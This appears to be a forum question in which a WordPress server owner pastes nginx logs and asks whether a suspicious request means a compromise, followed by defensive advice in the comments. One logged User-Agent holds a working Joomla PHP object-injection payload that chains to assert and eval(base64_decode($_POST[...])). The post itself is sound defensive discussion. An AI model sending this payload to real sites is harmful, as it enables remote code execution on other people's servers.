1

I have a server running ubuntu 14.04. On it i have latest wordpress version on nginx. I was going trough my logs and noticed this.

198.204.224.122 - - [05/Dec/2017:13:06:10 +0200] "GET / HTTP/1.1" 200 826 "-" "}__test|O:21:\x22JDatabaseDriverMysqli\x22:3:{s:4:\x22\x5C0\x5C0\x5C0a\x22;O:17:\x22JSimplepieFactory\x22:0:{}s:21:\x22\x5C0\x5C0\x5C0disconnectHandlers\x22;a:1:{i:0;a:2:{i:0;O:9:\x22SimplePie\x22:5:{s:8:\x22sanitize\x22;O:20:\x22JDatabaseDriverMysql\x22:0:{}s:5:\x22cache\x22;b:1;s:19:\x22cache_name_function\x22;s:6:\x22assert\x22;s:10:\x22javascript\x22;i:9999;s:8:\x22feed_url\x22;s:54:\x22eval(base64_decode($_POST[111]));JFactory::get();exit;\x22;}i:1;s:4:\x22init\x22;}}s:13:\x22\x5C0\x5C0\x5C0connection\x22;i:1;}\xF0\x9D\x8C\x86"

I looked around the internet and i found that it use to be joomla problem but im still worried because i see that that request was handled with status code 200. Later on i noticed this happening in my logs

162.158.92.173 0.058 - [05/Dec/2017:13:35:13 +0200] "GET /wp-admin/users.php HTTP/1.1" 200 10389 " /wp-admin/update-core.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.89 Safari/537.36 OPR/49.0.2725.47" 162.158.92.173 0.002 - [05/Dec/2017:13:35:13 +0200] "GET /wp-admin/load-scripts.php?c=1&load%5B%5D=hoverIntent,common,admin-bar,svg-painter,heartbeat,wp-auth-check&ver=4.9.1 HTTP/1.1" 200 12580 " /wp-admin/users.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.89 Safari/537.36 OPR/49.0.2725.47" 162.158.92.173 0.035 - [05/Dec/2017:13:36:14 +0200] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 78 " /wp-admin/users.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.89 Safari/537.36 OPR/49.0.2725.47" 162.158.92.173 0.033 - [05/Dec/2017:13:37:15 +0200] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 78 " /wp-admin/users.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.89 Safari/537.36 OPR/49.0.2725.47" 162.158.92.173 0.030 - [05/Dec/2017:13:39:16 +0200] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 78 " /wp-admin/users.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.89 Safari/537.36 OPR/49.0.2725.47" 162.158.92.173 0.028 - [05/Dec/2017:13:41:17 +0200] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 78 " /wp-admin/users.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.89 Safari/537.36 OPR/49.0.2725.47" 162.158.92.173 0.033 - [05/Dec/2017:13:43:18 +0200] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 78 " /wp-admin/users.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.89 Safari/537.36 OPR/49.0.2725.47" 162.158.92.173 0.031 - [05/Dec/2017:13:45:19 +0200] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 78 " /wp-admin/users.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.89 Safari/537.36 OPR/49.0.2725.47" 162.158.92.173 0.030 - [05/Dec/2017:13:47:28 +0200] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 78 " /wp-admin/users.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.89 Safari/537.36 OPR/49.0.2725.47" 162.158.92.173 0.060 - [05/Dec/2017:13:47:29 +0200] "GET /wp-admin/users.php HTTP/1.1" 200 10389 " /wp-admin/users.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.89 Safari/537.36 OPR/49.0.2725.47" 162.158.92.173 0.029 - [05/Dec/2017:13:48:30 +0200] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 78 " /wp-admin/users.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.89 Safari/537.36 OPR/49.0.2725.47"

Should i be worried ? By the way i am running fail2ban however i have cloudflare aswell which makes it harder for me to ban the ips.

xPalis
  • 11
  • 5
  • Hard to say if they got in - anyone can send any request to your server. Rename your admin user, never post using that username, disable pages that can reveal usernames (there are plugins for this). Ensure you have good backups so you can restore if something goes wrong. How much you do depends on how important your server is. – Tim Dec 06 '17 at 19:42
  • I have an article on [protecting a server with Fail2Ban and CloudFlare](https://www.photographerstechsupport.com/aws-amazon-web-services/protecting-amazon-linux-server-fail2ban-cloudflare-wordpress/). fail2ban adds IPs to CloudFlare firewall, then removes them a couple of days later. – Tim Dec 06 '17 at 19:42
  • It looks just as a simple probe. In the wild those happen all the time. – Konrad Gajewski Dec 07 '17 at 00:25
  • First of all than you very much for comming here and commenting. @Tim i did check my wordpress users and there were no new users added. And i used your guide to block ips from my website and it seems to work beautifuly :) i have blocked wp-admin directory in nginx config and allowed only my ip however it seems to block all ips anyway :/ – xPalis Dec 09 '17 at 09:05

0 Answers0